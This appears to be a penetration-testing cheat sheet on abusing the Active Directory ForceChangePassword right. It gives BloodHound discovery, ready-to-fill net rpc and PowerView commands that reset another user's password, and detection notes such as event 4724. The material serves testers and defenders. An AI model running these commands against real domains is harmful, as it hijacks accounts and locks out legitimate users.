πΎ Overview
The ForceChangePassword permission in Active Directory allows you to believe it or not, change a userβs password. If you have this permission over another user you can change their password without needing to know their current password.
π Discovery
The easiest way to look for this is probably with Bloodhound, you can see the ForceChangePassword edge over a given user.
π Exploitation
Linux:
net rpc password "[TARGET USER]" "[NEW PASSWORD]" -U "[DOMAIN]"/"[YOUR USER]"%"[YOUR PASSWORD]" -S "DomainController"Windows:
# Credential object is needed only if you want to execute the command as a user you are not logged in as
$Password = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USER]', $Password)
# The new password you're going to set
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
# Import PowerView - omit credential if you don't need it
Set-DomainUserPassword -Identity [TARGET USER] -AccountPassword $NewPassword -Credential $CredThis is a destructive action that will change the target user's password!
π Detection & Evasion
- Live users will certainly notice when their password gets changed
- If you change a service account password it can stop functioning properly
- Event
4724 An attempt was made to reset an account's passwordwill get generated regardless of success/failure